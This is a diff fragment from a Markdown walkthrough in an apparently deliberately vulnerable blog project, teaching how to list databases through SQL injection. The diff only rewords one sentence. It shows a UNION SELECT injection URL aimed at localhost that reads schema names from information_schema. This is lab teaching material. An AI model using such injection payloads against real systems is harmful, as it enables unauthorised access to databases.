gbuszmicz/insecure-blog-project/challenges/SQLi/d.Get_all_databases.md

 }
 ```

 This is because the query returns more than one row.
-So we have to *limit* the output listing the databases one by one, like this:
+So we have to *limit* the output, listing the databases **one by one**, like this:
 ```shell
 http://localhost:8080/p/2 UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 1),3,4,5,6,7,8,9/slug-name-post'
 ```